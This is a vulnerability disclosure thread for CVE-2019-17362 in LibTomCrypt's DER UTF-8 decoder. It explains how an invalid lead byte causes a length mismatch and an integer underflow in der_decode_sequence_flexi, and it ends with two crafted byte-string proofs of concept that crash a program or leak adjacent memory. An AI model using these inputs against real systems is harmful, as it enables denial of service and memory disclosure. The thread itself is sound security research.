CVE-2019-17362 - vulnerability in der_decode_utf8_string

Question

werew opened this issue 5 years ago · comments

Description

The der_decode_utf8_string function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF-8 sequences.
This allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) or read information from other memory locations via carefully crafted DER-encoded data.

Attack vectors

To exploit this vulnerability, an attacker must be able to provide crafted DER-encoded data to LibTomCrypt (e.g. by importing an X.509 certificate).
Information disclosure is made possible by a two-step attack in which the imported data is later re-encoded and sent back to the attacker (e.g. importing and then exporting an X.509 certificate).

Details

This vulnerability affects LibTomCrypt 1.18.2 and earlier versions.
For the remainder of this issue I will refer to the code of the latest released version of LibTomCrypt (i.e. version 1.18.2, https://www.libtom.net/news/LTC_1.18.2/).

The cause of the problem lies in the decoding loop at line 71 of der_decode_utf8_string.c:

   /* proceed to decode */
   for (y = 0; x < inlen; ) {
      /* get first byte */
      tmp = in[x++];

      /* count number of bytes */
      for (z = 0; (tmp & 0x80) && (z <= 4); z++, tmp = (tmp << 1) & 0xFF);

      if (z > 4 || (x + (z - 1) > inlen)) {
         return CRYPT_INVALID_PACKET;
      }

      /* decode, grab upper bits */
      tmp >>= z;

      /* grab remaining bytes */
      if (z > 1) { --z; }
      while (z-- != 0) {
         if ((in[x] & 0xC0) != 0x80) {
            return CRYPT_INVALID_PACKET;
         }
         tmp = (tmp << 6) | ((wchar_t)in[x++] & 0x3F);
      }

      if (y < *outlen) {
         out[y] = tmp;
      }
      y++;
   }

Here the variable tmp contains the value of the first byte of the UTF-8 encoded character.
In accordance with the UTF-8 encoding rules, the number of most significant bits of tmp set to 1 (from left to right) before the first 0 indicates the number of bytes used to encode the character (e.g. a sequence starting with 110xxxxx is 2 bytes long).

However, notice that 10xxxxxx is not a valid first byte: this form is reserved for continuation bytes.
The loop in question fails to detect this case and processes a sequence starting with 10xxxxxx as if it were a sequence of two bytes.
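As a minimal sketch of the missing check, the helper below classifies a lead byte and rejects the 10xxxxxx form. The name utf8_lead_len is hypothetical and not part of LibTomCrypt; this only illustrates the rule and is not necessarily how the library was or should be patched.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper (not a LibTomCrypt function): returns the total length
 * in bytes of the UTF-8 sequence introduced by lead byte b, or 0 if b cannot
 * start a sequence. */
size_t utf8_lead_len(unsigned char b)
{
    if ((b & 0x80) == 0x00) return 1; /* 0xxxxxxx: single byte (ASCII)    */
    if ((b & 0xC0) == 0x80) return 0; /* 10xxxxxx: continuation, rejected */
    if ((b & 0xE0) == 0xC0) return 2; /* 110xxxxx                         */
    if ((b & 0xF0) == 0xE0) return 3; /* 1110xxxx                         */
    if ((b & 0xF8) == 0xF0) return 4; /* 11110xxx                         */
    return 0;                         /* 11111xxx: never a valid lead     */
}

/* Small self-check showing the case discussed in this issue. */
void utf8_lead_len_selfcheck(void)
{
    assert(utf8_lead_len(0xBF) == 0); /* 10111111 must not start a character */
    assert(utf8_lead_len(0xC3) == 2); /* 11000011 starts a 2-byte sequence   */
}
```

A decoder built on such a helper would return an error as soon as it sees 0 instead of continuing to read continuation bytes.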

A valid utf-8 sequence of two bytes is of the form: 110xxxxx 10xxxxxx and can encode values up to 0x7FF. Yet der_decode_utf8_string accepts sequences of two bytes of the form: 10xxxxxx 10xxxxxx.
This invalid form offers an additional free bit and can therefore encode values up to 0xFFF, hence including a range of values that would normally be encodable only using a sequence of at least 3 bytes.
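To make the extra bit concrete, here is a simplified single-character re-creation of the loop quoted above. The function name decode_one_like_1_18_2 is made up for this sketch, and one bounds check (marked in a comment) was added so that the sketch itself never reads past its input; everything else follows the quoted logic.

```c
#include <assert.h>
#include <stddef.h>

/* Decodes one character the way the quoted loop does. Returns 0 on success,
 * storing the value in *out and the bytes consumed in *used; -1 on rejection.
 * Illustrative only, not LibTomCrypt code. */
int decode_one_like_1_18_2(const unsigned char *in, size_t inlen,
                           unsigned long *out, size_t *used)
{
    size_t x = 0, z;
    unsigned long tmp;

    assert(in != NULL && out != NULL && used != NULL);
    if (inlen == 0) return -1;

    tmp = in[x++];
    /* count the leading 1 bits, shifting them out of the low 8 bits */
    for (z = 0; (tmp & 0x80) && (z <= 4); z++, tmp = (tmp << 1) & 0xFF) { }
    if (z > 4 || x + z - 1 > inlen) return -1;

    tmp >>= z;               /* keep only the payload bits of the lead byte */
    if (z > 1) { --z; }      /* z == 1 is left as is: this is the flaw      */
    while (z-- != 0) {
        if (x >= inlen) return -1;             /* added: keep the sketch in bounds */
        if ((in[x] & 0xC0) != 0x80) return -1; /* must be a continuation byte      */
        tmp = (tmp << 6) | (in[x++] & 0x3F);
    }
    *out = tmp;
    *used = x;
    return 0;
}
```

Feeding it the two bytes 0xBF 0xBF yields the value 0xFFF from only two input bytes, while the valid maximum two-byte sequence 0xDF 0xBF yields 0x7FF.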

This behavior can be used to trick der_length_utf8_string into reporting a length bigger than the actual size of the encoded string.
This works because the function der_utf8_charsize returns a number of bytes based on the size of the decoded value.
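The mismatch can be illustrated with a stand-in for the size computation. The thresholds below are the standard UTF-8 ones and are an assumption of this sketch rather than a copy of der_utf8_charsize; both function names are hypothetical, and only short-form DER lengths (payload under 128 bytes) are handled.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for der_utf8_charsize: bytes needed to encode value c, using the
 * standard UTF-8 thresholds (assumed, not copied from the library). */
size_t utf8_size_for_value(unsigned long c)
{
    if (c <= 0x7F)   return 1;
    if (c <= 0x7FF)  return 2;
    if (c <= 0xFFFF) return 3;
    return 4;
}

/* Length of a DER UTF8String element recomputed from decoded values:
 * 1 tag byte + 1 short-form length byte + payload bytes. */
size_t recomputed_der_len(const unsigned long *chars, size_t n)
{
    size_t payload = 0, i;

    assert(chars != NULL);
    for (i = 0; i < n; i++) {
        payload += utf8_size_for_value(chars[i]);
    }
    assert(payload < 128); /* this sketch handles short-form lengths only */
    return 1 + 1 + payload;
}
```

For the single decoded value 0xFFF this returns 5, whereas the element 0x0C 0x02 0xBF 0xBF that produced it occupies only 4 bytes on the wire.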

To see an example of how this can be exploited to crash the program or read data past the end of the DER buffer, let us consider the function der_decode_sequence_flexi (used to decode X.509 certificates).

When a UTF-8 entry is encountered, this function first decodes it into an array pointed to by l->data and then computes the length by calling der_length_utf8_string on the decoded data:

         case 0x0C: /* UTF8 */

            /* init field */
            l->type = LTC_ASN1_UTF8_STRING;
            l->size = len;

            if ((l->data = XCALLOC(sizeof(wchar_t), l->size)) == NULL) {
               err = CRYPT_MEM;
               goto error;
            }

            if ((err = der_decode_utf8_string(in, *inlen, l->data, &l->size)) != CRYPT_OK) {
               goto error;
            }

            if ((err = der_length_utf8_string(l->data, l->size, &len)) != CRYPT_OK) {
               goto error;
            }
            break;

The computed len is later used to advance some pointers:

      /* advance pointers */
      totlen  += len;
      in      += len;
      *inlen  -= len;

The variable inlen points to the number of bytes that remain to be decoded.
Using the aforementioned bug it is possible to craft an input such that len > *inlen.
In this case the unsigned subtraction wraps around, leaving *inlen with a value much larger than the actual size of the user's input.

Finally, this can be used to crash the program (e.g. by reading an invalid memory location) or to trick the DER decoder into including adjacent data in the decoded sequence.

PoC

Below I include two proofs of concept.

poc1 will likely cause a program to crash by triggering a read of 0xffffffff additional bytes (thus probably ending up in an invalid memory page).
poc2 will add 0xffff bytes of adjacent memory to the decoded sequence. This data can then be accessed, in a two-step attack scenario, by exporting the certificate.
Notice that poc2 will very likely NOT cause the program to crash, since any invalid DER type encountered after the leaked data will just cause the decoding to stop gracefully without causing any further error (line 436 of der_decode_sequence_flexi.c).

char *poc1 = "\x30\x04"                  // Start DER-sequence of length 4
             "\x0c\x02\xbf\xbf"          // Start UTF8 string of actual length 2 and evaluated length 3
             "\xaa"                      // One byte padding
             "\x30\x84\xff\xff\xff\xff"; // Start DER-sequence of length 0xffffffff (will very likely cause a crash)

char *poc2 = "\x30\x04"                 // Start DER-sequence of length 4
             "\x0c\x02\xbf\xbf"         // Start UTF8 string of actual length 2 and evaluated length 3
             "\xaa"                     // One byte padding
             "\x04\x82\xff\xff";        // Start OCTET STRING of length 0xffff
                                        // (this will include the adjacent data into the decoded certificate)

Luigi Coniglio · Answer 1 · Wed Oct 09 2019 19:25:54 GMT+0800 (China Standard Time)

This vulnerability has now been assigned the CVE ID CVE-2019-17362.

James Muir · Answer 2 · Thu Dec 24 2020 00:47:04 GMT+0800 (China Standard Time)

@werew : your write-up on this issue is really good. Thanks!

One thing that seems unusual about the test vectors you provide (poc1, poc2) is that they begin with "\x30\x04..." but are followed by more than four bytes. However, it doesn't seem like the DER sequence length matters in this exploit.

What is important is the value of "inlen", which is the input length that is passed to der_decode_sequence_flexi(). That is the value that is subject to underflow.